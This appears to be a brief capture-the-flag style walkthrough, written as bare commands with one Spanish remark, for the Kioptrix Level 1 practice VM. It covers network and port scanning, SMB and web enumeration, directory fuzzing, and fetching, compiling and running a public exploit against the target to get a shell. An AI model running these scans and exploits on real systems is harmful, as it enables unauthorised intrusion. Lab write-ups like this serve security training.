Kioptrix Level 1
HTB Linux
netdiscover -r 10.0.0.0/24
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn kioptrix.local -oG allPorts
nmap -sCV -p22,80,111,139,443,32768 kioptrix.local -oN targeted
smbclient -L kioptrix.local -N
nikto -h kioptrix.local
wfuzz -c -t 400 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://kioptrix.local/FUZZ
Pero no salio nada interesante.
searchsploit apache 1.3.2
searchsploit -m 10
gcc 10.c -o kioptrix_level1
chmod +x kioptrix_level1
./kioptrix_level1
./kioptrix_level1 -b=0 -c <kali_ip> <kioptrix_ip>
whoami